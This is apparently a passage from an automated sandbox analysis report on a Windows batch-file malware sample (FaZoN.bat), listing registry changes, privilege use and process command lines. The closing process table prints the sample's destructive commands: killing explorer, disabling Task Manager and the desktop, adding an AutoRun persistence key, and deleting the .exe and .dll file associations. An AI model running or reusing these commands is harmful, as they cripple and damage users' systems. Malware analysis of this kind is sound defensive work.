| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{EF11D5BB-4D5A-4136-AC20-6220C68B6EDF} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{DA8238FD-728D-4267-9BC7-7F6D29D4EE44} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{FF616862-825D-4B50-A32F-0E2997936EBE} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{4ECAEB51-E4B1-4B61-943B-4998728CF165} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{390BF571-BA7C-4A78-80C2-219879A69905} | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{FD834810-871D-4340-A66D-D8A4D4B1B0A8} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{C1945109-E5EA-47C6-9D63-C0100A85E031} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\cmd.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\cmd.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat" |
| C:\Windows\system32\msg.exe | msg * Gosha created by GGmex your computer infected |
| C:\Windows\system32\taskkill.exe | taskkill /f /im explorer.exe |
| C:\Windows\system32\reg.exe | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f |
| C:\Windows\system32\reg.exe | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f |
| C:\Windows\system32\reg.exe | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\system32\msg.exe | msg * Your desktop has been crashed |
| C:\Windows\system32\reg.exe | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f |
| C:\Windows\system32\msg.exe | msg * Your windows infected by gosha :) |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f |
| C:\Windows\system32\msg.exe | msg * Deleted files |
| C:\Windows\system32\msg.exe | msg * Your system has been removed... |
| C:\Windows\system32\msg.exe | msg * Click OK |
| C:\Windows\system32\cmd.exe | cmd |
| C:\Windows\system32\reg.exe | reg delete HKCR/.exe |
| C:\Windows\system32\reg.exe | reg delete HKCR/.dll |
| C:\Windows\system32\reg.exe | reg delete HKCR/* |
| C:\Windows\system32\cmd.exe | cmd |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\explorer.exe | explorer.exe |
